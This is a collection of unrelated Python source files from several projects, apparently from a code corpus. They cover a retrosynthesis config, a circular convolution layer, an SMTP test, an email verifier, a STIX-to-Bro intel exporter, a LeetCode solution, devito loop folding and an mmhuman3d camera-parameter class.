"rollout_rules": "data/sample_reaction_rule.csv",
"descriptor": "GCN",
"gcn_expansion_config": "model/sample.json",
"gcn_rollout_config": "model/sample.json",
"starting_material": "data/starting_materials.smi",
"save_result_dir": "result",
"target": "data/sample.mol"
}
return config
def get_node_info(node, ws):
"""
Args:
node (Node):
ws (list(int)): knowledge weights. [cdscore, rdscore, asscore, stscore]
Returns:
return node information for a searched tree analysis
node information: self node, parent node, depth, score, RDScore, CDScore, STScore, ASScore
"""
return (f"{id(node)}\t"
f"{id(node.parent_node)}\t"
f"{node.depth}\t"
f"{node.total_scores / node.visits}\t"
f"{node.state.rdscore}\t"
f"{node.state.cdscore * ws[0]}\t"
f"{node.state.stscore * ws[3]}\t"
f"{node.state.asscore * ws[2]}")
|
66779
|
import torch
import torchvision
import torchvision.transforms as transforms
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
class conv2d_circular(nn.Conv2d):
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
padding=0, dilation=1, groups=1, bias=True, nopad=False):
super(conv2d_circular, self).__init__(
in_channels, out_channels, kernel_size, stride, padding, dilation, groups, bias)
def forward(self, input_ori):
# print(self.padding[0])
# expanded_padding = ((self.padding[1] + 1) // 2, self.padding[1] // 2,
# (self.padding[0] + 1) // 2, self.padding[0] // 2)
input = F.pad(input_ori, (self.padding[0], self.padding[0], self.padding[0], self.padding[0]), mode="circular")
# input = F.pad(input_ori, (1,1,1,1), mode="circular")
# input = F.pad(input_ori, expanded_padding, mode="circular")
return F.conv2d(input, self.weight, self.bias, self.stride, 0, self.dilation, self.groups)
# return F.conv2d(F.pad(input_ori, expanded_padding, mode='circular'),
# self.weight, self.bias, self.stride,
# _pair(0), self.dilation, self.groups)
|
66823
|
import io
from os.path import dirname, abspath, join
from nanohttp import settings, configure
from restfulpy.messaging.providers import SMTPProvider
from restfulpy.mockup import mockup_smtp_server
HERE = abspath(dirname(__file__))
def test_smtp_provider():
configure(force=True)
settings.merge(f'''
smtp:
host: smtp.example.com
port: 587
username: <EMAIL>
password: password
local_hostname: localhost
tls: false
auth: false
ssl: false
messaging:
mako_modules_directory: {join(HERE, '../../data', 'mako_modules')}
template_directories:
- {join(HERE, 'templates')}
''',
)
with mockup_smtp_server() as (server, bind):
settings.smtp.host = bind[0]
settings.smtp.port = bind[1]
# Without templates
SMTPProvider().send(
'<EMAIL>',
'<EMAIL>',
'Simple test body',
cc='<EMAIL>',
bcc='<EMAIL>'
)
# With template
SMTPProvider().send(
'<EMAIL>',
'<EMAIL>',
{},
template_filename='test-email-template.mako'
)
# With attachments
attachment = io.BytesIO(b'This is test attachment file')
attachment.name = 'path/to/file.txt'
SMTPProvider().send(
'<EMAIL>',
'<EMAIL>',
'email body with Attachment',
attachments=[attachment]
)
|
66836
|
import re
import smtplib
import dns.resolver
# Address used for SMTP MAIL FROM command
fromAddress = '<EMAIL>'
# Simple Regex for syntax checking
regex = '^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,})$'
# Email address to verify
inputAddress = input('Please enter the emailAddress to verify:')
addressToVerify = str(inputAddress)
# Syntax check
match = re.match(regex, addressToVerify)
if match == None:
print('Bad Syntax')
raise ValueError('Bad Syntax')
# Get domain for DNS lookup
splitAddress = addressToVerify.split('@')
domain = str(splitAddress[1])
print('Domain:', domain)
# MX record lookup
records = dns.resolver.query(domain, 'MX')
mxRecord = records[0].exchange
mxRecord = str(mxRecord)
# SMTP lib setup (use debug level for full output)
server = smtplib.SMTP()
server.set_debuglevel(0)
# SMTP Conversation
server.connect(mxRecord)
server.helo(server.local_hostname) ### server.local_hostname(Get local server hostname)
server.mail(fromAddress)
code, message = server.rcpt(str(addressToVerify))
server.quit()
#print(code)
#print(message)
# Assume SMTP response 250 is success
if code == 250:
print('Success')
else:
print('Bad')
|
66849
|
import re
from cybox.objects.address_object import Address
from cybox.objects.uri_object import URI
from .text import StixTextTransform
class StixBroIntelTransform(StixTextTransform):
"""Generate observable details for the Bro Intelligence Framework.
This class can be used to generate a list of indicators (observables)
from a STIX package in a format suitable for importing into the Bro
network-based intrusion detection system using its Intelligence
Framework (see https://www.bro.org/sphinx-git/frameworks/intel.html).
Args:
package: the STIX package to process
separator: a string separator used in the text output
include_header: a boolean value that indicates whether or not header
information should be included in the text output
header_prefix: a string prepended to header lines in the output
source: a value to include in the output metadata field 'meta.source'
url: a value to include in the output field metadata 'meta.url'
do_notice: a value to include in the output metadata field
'meta.do_notice', if set to 'T' a Bro notice will be raised by Bro
on a match of this indicator
"""
OBJECT_FIELDS = {
'Address': ['address_value'],
'DomainName': ['value'],
'EmailMessage': [
'header.from_.address_value',
'header.to.address_value',
],
'File': ['hashes.simple_hash_value'],
'HTTPSession': ['http_request_response.http_client_request.' +
'http_request_header.parsed_header.user_agent'],
'SocketAddress': ['ip_address.address_value'],
'URI': ['value'],
}
OBJECT_CONSTRAINTS = {
'Address': {
'category': [Address.CAT_IPV4, Address.CAT_IPV6],
},
'URI': {
'type_': [URI.TYPE_URL],
},
}
STRING_CONDITION_CONSTRAINT = ['None', 'Equals']
HEADER_LABELS = [
'indicator', 'indicator_type', 'meta.source', 'meta.url',
'meta.do_notice', 'meta.if_in', 'meta.whitelist',
]
# Map Cybox object type to Bro Intel types.
BIF_TYPE_MAPPING = {
'Address': 'Intel::ADDR',
'DomainName': 'Intel::DOMAIN',
'EmailMessage': 'Intel::EMAIL',
'File': 'Intel::FILE_HASH',
'HTTPSession': 'Intel::SOFTWARE',
'SocketAddress': 'Intel::ADDR',
'URI': 'Intel::URL',
}
# Map observable id prefix to source and url.
BIF_SOURCE_MAPPING = {
'cert_au': {
'source': 'CERT-AU',
'url': 'https://www.cert.gov.au/',
},
'CCIRC-CCRIC': {
'source': 'CCIRC',
'url': ('https://www.publicsafety.gc.ca/' +
'cnt/ntnl-scrt/cbr-scrt/ccirc-ccric-eng.aspx'),
},
'NCCIC': {
'source': 'NCCIC',
'url': 'https://www.us-cert.gov/',
},
}
def __init__(self, package, default_title=None, default_description=None,
default_tlp='AMBER', separator='\t', include_header=False,
header_prefix='#', source='UNKNOWN', url='', do_notice='T'):
super(StixBroIntelTransform, self).__init__(
package, default_title, default_description, default_tlp,
separator, include_header, header_prefix,
)
self.source = source
self.url = url
self.do_notice = do_notice
# Make URIs suitable for the Bro format (remove protocol)
self._fix_uris()
# ##### Properties
@property
def source(self):
return self._source
@source.setter
def source(self, source):
self._source = '' if source is None else str(source)
@property
def url(self):
return self._url
@url.setter
def url(self, url):
self._url = '' if url is None else str(url)
@property
def do_notice(self):
return self._do_notice
@do_notice.setter
def do_notice(self, do_notice):
if do_notice not in ['T', 'F']:
raise TypeError('expected \'T\' or \'F\'')
self._do_notice = do_notice
# ##### Class helper methods
def _fix_uris(self):
if 'URI' in self.observables:
for observable in self.observables['URI']:
if 'fields' in observable:
for field in observable['fields']:
if 'value' in field:
field['value'] = re.sub(
pattern=r'^(https?|ftp)://',
repl='',
string=field['value'],
)
# ##### Overridden class methods
def text_for_object_type(self, object_type):
text = ''
if object_type in self.observables:
for observable in self.observables[object_type]:
# Look up source and url from observable ID
id_prefix = observable['id'].split(':')[0]
if id_prefix in self.BIF_SOURCE_MAPPING:
source = self.BIF_SOURCE_MAPPING[id_prefix]['source']
url = self.BIF_SOURCE_MAPPING[id_prefix]['url']
else:
source = self.source
url = self.url
bif_type = self.BIF_TYPE_MAPPING[object_type]
for fields in observable['fields']:
for field in self.OBJECT_FIELDS[object_type]:
if field in fields:
field_values = [
fields[field],
bif_type,
source,
url,
self.do_notice,
'-',
'-',
]
text += self.join(field_values) + '\n'
return text
|
66977
|
class Solution:
# @param {integer} x
# @return {integer}
def reverse(self, x):
neg = False
if x<0:
neg =True
x = -x
print x
reversed_int = int(''.join(reversed(str(x))))
if reversed_int>(1<<31):
reversed_int = 0
if neg:
return -reversed_int
else:
return reversed_int
|
66983
|
import cgen as c
from sympy import Symbol
from devito.cgen_utils import ccode
from devito.ir.iet import (Expression, Iteration, List, UnboundedIndex, ntags,
FindAdjacentIterations, FindNodes, IsPerfectIteration,
NestedTransformer, Transformer, compose_nodes,
is_foldable, retrieve_iteration_tree)
from devito.symbolics import as_symbol, xreplace_indices
from devito.tools import as_tuple
__all__ = ['fold_blockable_tree', 'unfold_blocked_tree']
def fold_blockable_tree(node, exclude_innermost=False):
"""
Create :class:`IterationFold`s from sequences of nested :class:`Iteration`.
"""
found = FindAdjacentIterations().visit(node)
found.pop('seen_iteration')
mapper = {}
for k, v in found.items():
for i in v:
# Pre-condition: they all must be perfect iterations
assert len(i) > 1
if any(not IsPerfectIteration().visit(j) for j in i):
continue
# Only retain consecutive trees having same depth
trees = [retrieve_iteration_tree(j)[0] for j in i]
handle = []
for j in trees:
if len(j) != len(trees[0]):
break
handle.append(j)
trees = handle
if not trees:
continue
# Check foldability
pairwise_folds = list(zip(*reversed(trees)))
if any(not is_foldable(j) for j in pairwise_folds):
continue
# Maybe heuristically exclude innermost Iteration
if exclude_innermost is True:
pairwise_folds = pairwise_folds[:-1]
# Perhaps there's nothing to fold
if len(pairwise_folds) == 1:
continue
# Perform folding
for j in pairwise_folds:
root, remainder = j[0], j[1:]
folds = [(tuple(y-x for x, y in zip(i.offsets, root.offsets)), i.nodes)
for i in remainder]
mapper[root] = IterationFold(folds=folds, **root.args)
for k in remainder:
mapper[k] = None
# Insert the IterationFolds in the Iteration/Expression tree
processed = NestedTransformer(mapper).visit(node)
return processed
def unfold_blocked_tree(node):
"""
Unfold nested :class:`IterationFold`.
:Example:
Given a section of Iteration/Expression tree as below: ::
for i = 1 to N-1 // folded
for j = 1 to N-1 // folded
foo1()
Assuming a fold with offset 1 in both /i/ and /j/ and body ``foo2()``, create: ::
for i = 1 to N-1
for j = 1 to N-1
foo1()
for i = 2 to N-2
for j = 2 to N-2
foo2()
"""
# Search the unfolding candidates
candidates = []
for tree in retrieve_iteration_tree(node):
handle = tuple(i for i in tree if i.is_IterationFold)
if handle:
# Sanity check
assert IsPerfectIteration().visit(handle[0])
candidates.append(handle)
# Perform unfolding
tag = ntags()
mapper = {}
for tree in candidates:
trees = list(zip(*[i.unfold() for i in tree]))
# Update tag
for i, _tree in enumerate(list(trees)):
trees[i] = tuple(j.retag(tag + i) for j in _tree)
trees = optimize_unfolded_tree(trees[:-1], trees[-1])
mapper[tree[0]] = List(body=trees)
# Insert the unfolded Iterations in the Iteration/Expression tree
processed = Transformer(mapper).visit(node)
return processed
def optimize_unfolded_tree(unfolded, root):
"""
Transform folded trees to reduce the memory footprint.
Examples
========
Given:
.. code-block::
for i = 1 to N - 1 # Folded tree
for j = 1 to N - 1
tmp[i,j] = ...
for i = 2 to N - 2 # Root
for j = 2 to N - 2
... = ... tmp[i,j] ...
The temporary ``tmp`` has shape ``(N-1, N-1)``. However, as soon as the
iteration space is blocked, with blocks of shape ``(i_bs, j_bs)``, the
``tmp`` shape can be shrunk to ``(i_bs-1, j_bs-1)``. The resulting
iteration tree becomes:
.. code-block::
for i = 1 to i_bs + 1 # Folded tree
for j = 1 to j_bs + 1
i' = i + i_block - 2
j' = j + j_block - 2
tmp[i,j] = ... # use i' and j'
for i = i_block to i_block + i_bs # Root
for j = j_block to j_block + j_bs
i' = i - x_block
j' = j - j_block
... = ... tmp[i',j'] ...
"""
processed = []
for i, tree in enumerate(unfolded):
assert len(tree) == len(root)
modified_tree = []
modified_root = []
mapper = {}
# "Shrink" the iteration space
for t1, t2 in zip(tree, root):
index = Symbol('%ss%d' % (t1.index, i))
mapper[t1.dim] = index
t1_uindex = (UnboundedIndex(index, t1.limits[0]),)
t2_uindex = (UnboundedIndex(index, -t1.limits[0]),)
limits = (0, t1.limits[1] - t1.limits[0], t1.incr_symbolic)
modified_tree.append(t1._rebuild(limits=limits,
uindices=t1.uindices + t1_uindex))
modified_root.append(t2._rebuild(uindices=t2.uindices + t2_uindex))
# Temporary arrays can now be moved onto the stack
exprs = FindNodes(Expression).visit(modified_tree[-1])
if all(not j.is_Remainder for j in modified_tree):
dimensions = tuple(j.limits[0] for j in modified_root)
for j in exprs:
if j.write.is_Array:
j_dimensions = dimensions + j.write.dimensions[len(modified_root):]
j_shape = tuple(k.symbolic_size for k in j_dimensions)
j.write.update(shape=j_shape, dimensions=j_dimensions, onstack=True)
# Substitute iteration variables within the folded trees
modified_tree = compose_nodes(modified_tree)
replaced = xreplace_indices([j.expr for j in exprs], mapper, only_rhs=True)
subs = [j._rebuild(expr=k) for j, k in zip(exprs, replaced)]
processed.append(Transformer(dict(zip(exprs, subs))).visit(modified_tree))
# Introduce the new iteration variables within /root/
modified_root = compose_nodes(modified_root)
exprs = FindNodes(Expression).visit(modified_root)
candidates = [as_symbol(j.output) for j in subs]
replaced = xreplace_indices([j.expr for j in exprs], mapper, candidates)
subs = [j._rebuild(expr=k) for j, k in zip(exprs, replaced)]
root = Transformer(dict(zip(exprs, subs))).visit(modified_root)
return processed + [root]
class IterationFold(Iteration):
"""
An IterationFold is a special :class:`Iteration` object that represents
a sequence of consecutive (in program order) Iterations. In an IterationFold,
all Iterations of the sequence but the so called ``root`` are "hidden"; that is,
they cannot be visited by an Iteration/Expression tree visitor.
The Iterations in the sequence represented by the IterationFold all have same
dimension and properties. However, their extent is relative to that of the ``root``.
"""
is_IterationFold = True
def __init__(self, *args, **kwargs):
self.folds = kwargs.pop('folds', None)
super(IterationFold, self).__init__(*args, **kwargs)
def __repr__(self):
properties = ""
if self.properties:
properties = [str(i) for i in self.properties]
properties = "WithProperties[%s]::" % ",".join(properties)
index = self.index
if self.uindices:
index += '[%s]' % ','.join(ccode(i.index) for i in self.uindices)
length = "Length %d" % len(self.folds)
return "<%sIterationFold %s; %s; %s>" % (properties, index, self.limits, length)
@property
def ccode(self):
comment = c.Comment('This IterationFold is "hiding" one or more Iterations')
code = super(IterationFold, self).ccode
return c.Module([comment, code])
def unfold(self):
"""
Return the corresponding :class:`Iteration` objects from each fold in ``self``.
"""
args = self.args
args.pop('folds')
# Construct the root Iteration
root = Iteration(**args)
# Construct the folds
args.pop('nodes')
ofs = args.pop('offsets')
try:
start, end, incr = args.pop('limits')
except TypeError:
start, end, incr = self.limits
folds = tuple(Iteration(nodes, limits=(start, end, incr),
offsets=tuple(i-j for i, j in zip(ofs, shift)), **args)
for shift, nodes in self.folds)
return folds + as_tuple(root)
|
66985
|
from .monitor_bad_pixel_bokeh import BadPixelMonitor
from .monitor_bias_bokeh import BiasMonitor
from .monitor_dark_bokeh import DarkMonitor
from .monitor_filesystem_bokeh import MonitorFilesystem
from .monitor_mast_bokeh import MastMonitor
from .monitor_readnoise_bokeh import ReadnoiseMonitor
|
66995
|
import pytest
from configargparse import Namespace
from pydpiper.core.arguments import CompoundParser, AnnotatedParser, application_parser, parse #, lsq6_parser, lsq12_parser
from pydpiper.pipelines.MBM import mbm_parser
# TODO should these test files be named test_*?
# should these be fixtures or not?
@pytest.fixture
def two_mbm_parser():
return CompoundParser([AnnotatedParser(parser=mbm_parser, prefix="mbm1", namespace="mbm1"),
AnnotatedParser(parser=mbm_parser, prefix="mbm2", namespace="mbm2")])
@pytest.fixture
def four_mbm_parser(two_mbm_parser):
return CompoundParser([AnnotatedParser(parser=two_mbm_parser, prefix="first-two", namespace="first_two"),
AnnotatedParser(parser=two_mbm_parser, prefix="last-two", namespace="last_two")])
@pytest.fixture()
def two_mbm_parse(two_mbm_parser):
return parse(two_mbm_parser, ["--mbm1-lsq12-max-pairs=22", "--mbm1-bootstrap", "--mbm2-bootstrap"])
@pytest.fixture()
def four_mbm_parse(four_mbm_parser):
return parse(four_mbm_parser, ["--first-two-mbm1-lsq12-max-pairs=22",
"--first-two-mbm2-lsq12-max-pairs", "23",
"--last-two-mbm1-lsq12-max-pairs=24",
"--last-two-mbm2-lsq12-max-pairs=25",
"--first-two-mbm1-bootstrap", "--first-two-mbm2-bootstrap",
"--last-two-mbm1-bootstrap", "--last-two-mbm2-bootstrap"])
@pytest.fixture()
def application_parse(two_mbm_parser):
return parse(CompoundParser([application_parser,
AnnotatedParser(parser=two_mbm_parser, prefix="two-mbms", namespace="two-mbms")]),
["--two-mbms-mbm1-bootstrap", "--two-mbms-mbm2-bootstrap",
"--two-mbms-mbm1-lsq12-max-pairs", "23", "--two-mbms-mbm2-lsq12-max-pairs=24", "img_1.mnc"])
def is_recursive_subnamespace(n1, n2):
"""Is n1 a recursive substructure (not a subset!) of n2?"""
return all((f in n2.__dict__ and
(n1.__dict__[f] == n2.__dict__[f] or
(type(n1.__dict__[f]) == type(n2.__dict__[f]) == Namespace and
# isinstance(n1.__dict__[f], Namespace) and isinstance(n1.__dict__[f], Namespace) and
is_recursive_subnamespace(n1.__dict__[f], n2.__dict__[f])))
for f in n1.__dict__))
class TestArgumentParsing():
def test_nested_parsing(self, two_mbm_parse):
assert is_recursive_subnamespace(Namespace(mbm1=Namespace(lsq12=Namespace(max_pairs=22)),
mbm2=Namespace(lsq12=Namespace(max_pairs=25))),
two_mbm_parse)
def test_deeper_nesting(self, four_mbm_parse):
assert is_recursive_subnamespace(Namespace(first_two=Namespace(mbm1=Namespace(lsq12=Namespace(max_pairs=22)),
mbm2=Namespace(lsq12=Namespace(max_pairs=23))),
last_two=Namespace(mbm1=Namespace(lsq12=Namespace(max_pairs=24)),
mbm2=Namespace(lsq12=Namespace(max_pairs=25)))),
four_mbm_parse)
def test_with_files(self, application_parse):
assert is_recursive_subnamespace(Namespace(application=Namespace(files=["img_1.mnc"]),
mbm=Namespace(lsq12=Namespace(max_pairs=20))),
application_parse)
|
67045
|
import json
import warnings
from enum import Enum
from typing import Any, List, Tuple, Union
import numpy as np
import torch
from mmhuman3d.core.cameras.cameras import PerspectiveCameras
from mmhuman3d.core.conventions.cameras.convert_convention import (
convert_camera_matrix,
convert_K_3x3_to_4x4,
convert_K_4x4_to_3x3,
)
from .builder import build_cameras
_CAMERA_PARAMETER_SUPPORTED_KEYS_ = {
'H': {
'type': int,
},
'W': {
'type': int,
},
'in_mat': {
'type': list,
'len': 3,
},
'rotation_mat': {
'type': list,
'len': 3,
},
'translation': {
'type': list,
'len': 3,
},
'k1': {
'type': float,
},
'k2': {
'type': float,
},
'k3': {
'type': float,
},
'k4': {
'type': float,
},
'k5': {
'type': float,
},
'k6': {
'type': float,
},
'p1': {
'type': float,
},
'p2': {
'type': float,
},
}
class _TypeValidation(Enum):
MATCH = 0
ARRAY = 1
FAIL = 2
class CameraParameter:
logger = None
SUPPORTED_KEYS = _CAMERA_PARAMETER_SUPPORTED_KEYS_
def __init__(self,
name: str = 'default',
H: int = 1080,
W: int = 1920) -> None:
"""
Args:
name (str, optional):
Name of this camera. Defaults to "default".
H (int, optional):
Height of a frame, in pixel. Defaults to 1080.
W (int, optional):
Width of a frame, in pixel. Defaults to 1920.
"""
self.name = name
self.parameters_dict = {}
in_mat = __zero_mat_list__(3)
self.parameters_dict['in_mat'] = in_mat
for distort_name in __distort_coefficient_names__:
self.parameters_dict[distort_name] = 0.0
_, H = self.validate_item('H', H)
self.parameters_dict['H'] = H
_, W = self.validate_item('W', W)
self.parameters_dict['W'] = W
r_mat = __zero_mat_list__(3)
self.parameters_dict['rotation_mat'] = r_mat
t_list = [0.0, 0.0, 0.0]
self.parameters_dict['translation'] = t_list
def reset_distort(self) -> None:
"""Reset all distort coefficients to zero."""
for distort_name in __distort_coefficient_names__:
self.parameters_dict[distort_name] = 0.0
def get_opencv_distort_mat(self) -> np.ndarray:
"""Get a numpy array of 8 distort coefficients, which is the distCoeffs
arg of cv2.undistort.
Returns:
ndarray:
(k_1, k_2, p_1, p_2, k_3, k_4, k_5, k_6) of 8 elements.
"""
dist_coeffs = [
self.get_value('k1'),
self.get_value('k2'),
self.get_value('p1'),
self.get_value('p2'),
self.get_value('k3'),
self.get_value('k4'),
self.get_value('k5'),
self.get_value('k6'),
]
dist_coeffs = np.array(dist_coeffs)
return dist_coeffs
def set_KRT(self,
K_mat: np.ndarray,
R_mat: np.ndarray,
T_vec: np.ndarray,
inverse_extrinsic: bool = False) -> None:
"""Set intrinsic and extrinsic of a camera.
Args:
K_mat (np.ndarray):
In shape [3, 3].
R_mat (np.ndarray):
Rotation from world to view in default.
In shape [3, 3].
T_vec (np.ndarray):
Translation from world to view in default.
In shape [3,].
inverse_extrinsic (bool, optional):
If true, R_mat and T_vec transform a point
from view to world. Defaults to False.
"""
k_shape = K_mat.shape
assert k_shape[0] == k_shape[1] == 3
r_shape = R_mat.shape
assert r_shape[0] == r_shape[1] == 3
assert T_vec.ndim == 1 and T_vec.shape[0] == 3
self.set_mat_np('in_mat', K_mat)
if inverse_extrinsic:
R_mat = np.linalg.inv(R_mat)
T_vec = -np.dot(R_mat, T_vec).reshape((3))
self.set_mat_np('rotation_mat', R_mat)
self.set_value('translation', T_vec.tolist())
def get_KRT(self, k_dim=3) -> List[np.ndarray]:
"""Get intrinsic and extrinsic of a camera.
Args:
k_dim (int, optional):
Dimension of the returned mat K.
Defaults to 3.
Raises:
ValueError: k_dim is neither 3 nor 4.
Returns:
List[np.ndarray]:
K_mat (np.ndarray):
In shape [3, 3].
R_mat (np.ndarray):
Rotation from world to view in default.
In shape [3, 3].
T_vec (np.ndarray):
Translation from world to view in default.
In shape [3,].
"""
K_3x3 = self.get_mat_np('in_mat')
R_mat = self.get_mat_np('rotation_mat')
T_vec = np.asarray(self.get_value('translation'))
if k_dim == 3:
return [K_3x3, R_mat, T_vec]
elif k_dim == 4:
K_3x3 = np.expand_dims(K_3x3, 0) # shape (1, 3, 3)
K_4x4 = convert_K_3x3_to_4x4(
K=K_3x3, is_perspective=True) # shape (1, 4, 4)
K_4x4 = K_4x4[0, :, :]
return [K_4x4, R_mat, T_vec]
else:
raise ValueError(f'K mat cannot be converted to {k_dim}x{k_dim}')
def set_mat_np(self, mat_key: str, mat_numpy: np.ndarray) -> None:
"""Set a matrix-type parameter to mat_numpy.
Args:
mat_key (str):
Key of the target matrix. in_mat or rotation_mat.
mat_numpy (ndarray):
Matrix in numpy format.
Raises:
TypeError:
mat_numpy is not an np.ndarray.
"""
if not isinstance(mat_numpy, np.ndarray):
raise TypeError
self.set_mat_list(mat_key, mat_numpy.tolist())
def set_mat_list(self, mat_key: str, mat_list: List[list]) -> None:
"""Set a matrix-type parameter to mat_list.
Args:
mat_key (str):
Key of the target matrix. in_mat or rotation_mat.
mat_list (List[list]):
Matrix in list format.
"""
_, mat_list = self.validate_item(mat_key, mat_list)
self.parameters_dict[mat_key] = mat_list
def set_value(self, key: str, value: Any) -> None:
"""Set a parameter to value.
Args:
key (str):
Name of the parameter.
value (object):
New value of the parameter.
"""
_, value = self.validate_item(key, value)
self.parameters_dict[key] = value
def get_value(self, key: str) -> Any:
"""Get a parameter by key.
Args:
key (str):
Name of the parameter.
Raises:
KeyError: key not in self.parameters_dict
Returns:
object:
Value of the parameter.
"""
if key not in self.parameters_dict:
raise KeyError(key)
else:
return self.parameters_dict[key]
def get_mat_np(self, key: str) -> np.ndarray:
"""Get a a matrix-type parameter by key.
Args:
key (str):
Name of the parameter.
Raises:
KeyError: key not in self.parameters_dict
Returns:
ndarray:
Value of the parameter.
"""
if key not in self.parameters_dict:
raise KeyError(key)
else:
mat_list = self.parameters_dict[key]
mat_np = np.array(mat_list).reshape((3, 3))
return mat_np
def to_string(self) -> str:
"""Convert self.to_dict() to a string.
Returns:
str:
A dict in json string format.
"""
dump_dict = self.to_dict()
ret_str = json.dumps(dump_dict)
return ret_str
def to_dict(self) -> dict:
"""Dump camera name and parameters to dict.
Returns:
dict:
Put self.name and self.parameters_dict
in one dict.
"""
dump_dict = self.parameters_dict.copy()
dump_dict['name'] = self.name
return dump_dict
def dump(self, json_path: str) -> None:
"""Dump camera name and parameters to a file.
Returns:
dict:
Put self.name and self.parameters_dict
in one dict, and dump them to a json file.
"""
dump_dict = self.to_dict()
with open(json_path, 'w') as f_write:
json.dump(dump_dict, f_write)
def load(self, json_path: str) -> None:
"""Load camera name and parameters from a file."""
with open(json_path, 'r') as f_read:
dumped_dict = json.load(f_read)
self.load_from_dict(dumped_dict)
def load_from_dict(self, json_dict: dict) -> None:
"""Load name and parameters from a dict.
Args:
json_dict (dict):
A dict comes from self.to_dict().
"""
for key in json_dict.keys():
if key == 'name':
self.name = json_dict[key]
elif key == 'rotation':
self.parameters_dict['rotation_mat'] = np.array(
json_dict[key]).reshape(3, 3).tolist()
elif key == 'translation':
self.parameters_dict[key] = np.array(json_dict[key]).reshape(
(3)).tolist()
else:
self.parameters_dict[key] = json_dict[key]
if '_mat' in key:
self.parameters_dict[key] = np.array(
self.parameters_dict[key]).reshape(3, 3).tolist()
def load_from_chessboard(self,
chessboard_dict: dict,
name: str,
inverse: bool = True) -> None:
"""Load name and parameters from a dict.
Args:
chessboard_dict (dict):
A dict loaded from json.load(chessboard_file).
name (str):
Name of this camera.
inverse (bool, optional):
Whether to inverse rotation and translation mat.
Defaults to False.
"""
camera_param_dict = \
__parse_chessboard_param__(chessboard_dict, name, inverse=inverse)
self.load_from_dict(camera_param_dict)
def load_kinect_from_smc(self, smc_reader, kinect_id: int) -> None:
"""Load name and parameters of a kinect from an SmcReader instance.
Args:
smc_reader (mmhuman3d.data.data_structures.smc_reader.SMCReader):
An SmcReader instance containing kinect camera parameters.
kinect_id (int):
Id of the target kinect.
"""
name = kinect_id
extrinsics_dict = \
smc_reader.get_kinect_color_extrinsics(
kinect_id, homogeneous=False
)
rot_np = extrinsics_dict['R']
trans_np = extrinsics_dict['T']
intrinsics_np = \
smc_reader.get_kinect_color_intrinsics(
kinect_id
)
resolution = \
smc_reader.get_kinect_color_resolution(
kinect_id
)
rmatrix = np.linalg.inv(rot_np).reshape(3, 3)
tvec = -np.dot(rmatrix, trans_np)
self.name = name
self.set_mat_np('in_mat', intrinsics_np)
self.set_mat_np('rotation_mat', rmatrix)
self.set_value('translation', tvec.tolist())
self.set_value('H', resolution[1])
self.set_value('W', resolution[0])
def load_iphone_from_smc(self,
smc_reader,
iphone_id: int = 0,
frame_id: int = 0) -> None:
"""Load name and parameters of an iPhone from an SmcReader instance.
Args:
smc_reader (mmhuman3d.data.data_structures.smc_reader.SMCReader):
An SmcReader instance containing kinect camera parameters.
iphone_id (int):
Id of the target iphone.
Defaults to 0.
frame_id (int):
Frame ID of one selected frame.
It only influences the intrinsics.
Defaults to 0.
"""
name = f'iPhone_{iphone_id}'
extrinsics_mat = \
smc_reader.get_iphone_extrinsics(
iphone_id, homogeneous=True
)
rot_np = extrinsics_mat[:3, :3]
trans_np = extrinsics_mat[:3, 3]
intrinsics_np = \
smc_reader.get_iphone_intrinsics(
iphone_id, frame_id
)
resolution = \
smc_reader.get_iphone_color_resolution(
iphone_id
)
rmatrix = np.linalg.inv(rot_np).reshape(3, 3)
tvec = -np.dot(rmatrix, trans_np)
self.name = name
self.set_mat_np('in_mat', intrinsics_np)
self.set_mat_np('rotation_mat', rmatrix)
self.set_value('translation', tvec.tolist())
self.set_value('H', resolution[1])
self.set_value('W', resolution[0])
@classmethod
def load_from_perspective_cameras(cls,
cam,
name: str,
resolution: Union[List, Tuple] = None):
"""Load parameters from a PerspectiveCameras and return a
CameraParameter.
Args:
cam (mmhuman3d.core.cameras.cameras.PerspectiveCameras):
An instance.
name (str):
Name of this camera.
"""
assert isinstance(cam, PerspectiveCameras
), 'Wrong input, support PerspectiveCameras only!'
if len(cam) > 1:
warnings.warn('Will only use the first camera in the batch.')
cam = cam[0]
resolution = resolution if resolution is not None else cam.resolution[
0].tolist()
height, width = int(resolution[0]), int(resolution[1])
cam_param = CameraParameter()
cam_param.__init__(H=height, W=width, name=name)
k_4x4 = cam.K # shape (1, 4, 4)
r_3x3 = cam.R # shape (1, 3, 3)
t_3 = cam.T # shape (1, 3)
is_perspective = cam.is_perspective()
in_ndc = cam.in_ndc()
k_4x4, r_3x3, t_3 = convert_camera_matrix(
K=k_4x4,
R=r_3x3,
T=t_3,
is_perspective=False,
in_ndc_dst=False,
in_ndc_src=in_ndc,
convention_src='pytorch3d',
convention_dst='opencv',
resolution_src=(height, width),
resolution_dst=(height, width))
k_3x3 = \
convert_K_4x4_to_3x3(k_4x4, is_perspective=is_perspective)
k_3x3 = k_3x3.numpy()[0]
r_3x3 = r_3x3.numpy()[0]
t_3 = t_3.numpy()[0]
cam_param.name = name
cam_param.set_mat_np('in_mat', k_3x3)
cam_param.set_mat_np('rotation_mat', r_3x3)
cam_param.set_value('translation', t_3.tolist())
cam_param.parameters_dict.update(H=height)
cam_param.parameters_dict.update(W=width)
return cam_param
def export_to_perspective_cameras(self) -> PerspectiveCameras:
"""Export to a opencv defined screen space PerspectiveCameras.
Returns:
Same defined PerspectiveCameras of batch_size 1.
"""
height = self.parameters_dict['H']
width = self.parameters_dict['W']
k_4x4, rotation, translation = self.get_KRT(k_dim=4)
k_4x4 = np.expand_dims(k_4x4, 0) # shape (1, 3, 3)
rotation = np.expand_dims(rotation, 0) # shape (1, 3, 3)
translation = np.expand_dims(translation, 0) # shape (1, 3)
new_K = torch.from_numpy(k_4x4)
new_R = torch.from_numpy(rotation)
new_T = torch.from_numpy(translation)
cam = build_cameras(
dict(
type='PerspectiveCameras',
K=new_K.float(),
R=new_R.float(),
T=new_T.float(),
convention='opencv',
in_ndc=False,
resolution=(height, width)))
return cam
def validate_item(self, key: Any, val: Any) -> List:
"""Check whether the key and its value matches definition in
CameraParameter.SUPPORTED_KEYS.
Args:
key (Any):
Key in CameraParameter.
val (Any):
Value to the key.
Raises:
KeyError:
key cannot be found in
CameraParameter.SUPPORTED_KEYS.
TypeError:
Value's type doesn't match definition.
Returns:
key (Any): The input key.
val (Any): The value casted into correct format.
"""
self.__check_key__(key)
